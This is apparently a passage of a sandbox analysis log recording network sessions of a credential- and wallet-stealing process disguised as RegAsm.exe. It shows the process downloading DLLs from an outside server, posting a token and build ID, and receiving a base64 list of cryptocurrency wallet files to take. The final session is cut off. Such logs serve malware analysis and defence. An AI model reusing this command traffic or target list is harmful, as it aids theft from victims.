2024-09-21 12:49:11 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-21 12:49:11 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-21 12:49:11 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-21 12:49:11 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-21 12:49:11 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49768	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:12 UTC	196	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:12 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:12 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:49:12 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 12:49:12 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-21 12:49:12 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-21 12:49:13 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49769	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:16 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:16 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------JECAFHJEGCFCBFIEGCAECont
2024-09-21 12:49:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49770	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:18 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:18 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------HIDAAKEGDBFIJJKFHCFBCont
2024-09-21 12:49:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:18 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49771	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:19 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:19 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 